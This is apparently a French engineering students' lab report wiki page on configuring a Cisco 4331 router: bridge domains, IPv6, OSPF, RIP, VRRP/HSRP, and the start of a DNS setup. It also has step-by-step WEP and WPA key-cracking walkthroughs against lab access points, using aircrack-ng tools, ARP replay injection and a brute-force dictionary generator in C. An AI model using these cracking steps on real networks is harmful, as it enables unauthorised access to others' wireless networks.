Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 3e semaine====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e semaine====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5ème semaine ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
